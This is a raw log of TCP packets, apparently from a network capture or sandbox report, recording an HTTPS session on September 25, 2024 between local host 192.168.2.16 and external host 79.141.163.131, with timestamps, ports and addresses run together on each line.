                                                                              Sep 25, 2024 19:02:13.342644930 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.343363047 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.343393087 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.343425035 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.343436003 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.343467951 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.343749046 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.344191074 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.344211102 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.344285011 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.344285011 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.344297886 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.344856024 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.345231056 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.345253944 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.345340967 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.345340967 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.345354080 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.345913887 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.441512108 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.441551924 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.441867113 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.441926003 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.441943884 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442015886 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442056894 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442073107 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442276001 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442296028 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442316055 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442332983 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442363977 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442507982 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442730904 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442755938 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442831993 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442832947 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.442847013 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.442945004 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.443139076 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443159103 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443269014 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.443280935 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443358898 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.443573952 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443593979 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443912983 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443960905 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.443967104 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.443993092 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.444026947 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.444026947 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.444205999 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.444374084 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.444394112 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.444581985 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.444593906 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.449028969 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518141031 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518208981 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518279076 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518341064 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518377066 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518450022 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518537045 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518580914 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518629074 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518640995 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.518683910 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.518800020 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.519001007 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.519052029 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.519079924 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.519090891 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.519135952 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.520097971 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522294044 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522336006 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522387028 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522424936 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522464037 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522511959 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522738934 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522778988 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522830963 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522847891 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.522887945 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.522934914 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523044109 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523083925 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523128986 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523139000 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523184061 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523238897 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523299932 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523350000 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523442030 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523453951 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523492098 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523823023 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.523931026 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.523972034 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.524015903 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.524028063 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.524065018 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.524179935 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607161999 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607209921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607263088 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607280016 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607315063 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607443094 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607567072 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607606888 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607654095 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607665062 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607706070 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607795000 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.607929945 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.607971907 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.608015060 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.608025074 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.608071089 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.608093023 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.608906984 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.608947992 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.608989954 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.608999968 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609044075 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.609136105 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.609278917 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609318018 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609405994 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.609405994 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.609421968 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609761953 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609810114 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609860897 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.609874010 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.609911919 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.610121965 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.610230923 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.610275984 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.610320091 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.610331059 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.610364914 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.610430002 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.612334013 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.612375021 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.612459898 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.612459898 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.612476110 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.612584114 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.697825909 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.697889090 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.697949886 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.698012114 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.698051929 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.698309898 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.699544907 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.699588060 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.699632883 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.699645996 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.699673891 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.699709892 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.700805902 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.700850964 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.700938940 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.700938940 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.700953960 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.701184988 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.701436043 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.701478958 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.701538086 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.701549053 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.701591969 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.701663017 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.701925039 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.701966047 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.702011108 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.702020884 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.702065945 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.702099085 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.702244043 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.702297926 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.702342987 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.702353954 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.702389956 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.702424049 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.702636003 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.702678919 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.702723980 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.702733994 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.702765942 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.702996016 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.703484058 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.703527927 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.703572035 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.703582048 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.703625917 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.703705072 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.784070969 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.784115076 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.784230947 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.784230947 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.784265995 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.785116911 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.785763025 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.785805941 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.785892963 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.785893917 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.785921097 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.786113977 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.787065983 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.787108898 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.787157059 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.787168026 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.787204981 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.787242889 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.787739992 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.787780046 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.787827969 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.787838936 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.787940025 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.787940025 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.788191080 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.788233042 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.788285971 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.788295984 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.788325071 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.788374901 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.788588047 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.788630009 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.788677931 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.788687944 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.788722992 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.788743019 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.788885117 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.788925886 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.788957119 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.788966894 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.789004087 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.789815903 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.789864063 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.789865971 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.789894104 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.789910078 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.789932966 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.789978027 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.870433092 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.870496035 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.870616913 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.870646954 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.870682955 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.870704889 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.872519016 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.872562885 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.872661114 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.872661114 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.872675896 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.873528957 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.873579025 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.873688936 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.873689890 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.873704910 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.873863935 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.874262094 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.874303102 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.874386072 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.874386072 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.874398947 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.874645948 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.874690056 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.874744892 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.874797106 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.874808073 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.874937057 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.874938011 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.875017881 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.875062943 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.875215054 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.875215054 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.875226974 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.875521898 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.875565052 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.875581026 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.875611067 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.875627041 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.875679970 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.875679970 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.876239061 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.876276970 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.876322985 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.876333952 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.876369953 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.876434088 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.956631899 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.956681967 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.956727982 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.956751108 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.956787109 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.956844091 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.959835052 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.959876060 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.960129976 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.960144043 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.960217953 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.962925911 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.962970018 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.963011980 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.963022947 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.963057995 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.963057995 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.965035915 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.965075970 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.965121984 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.965132952 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.965173006 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.965315104 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.965564966 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.965607882 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.965646982 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.965656996 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.965711117 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.966046095 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.966372013 CEST4434970479.141.163.131192.168.2.16
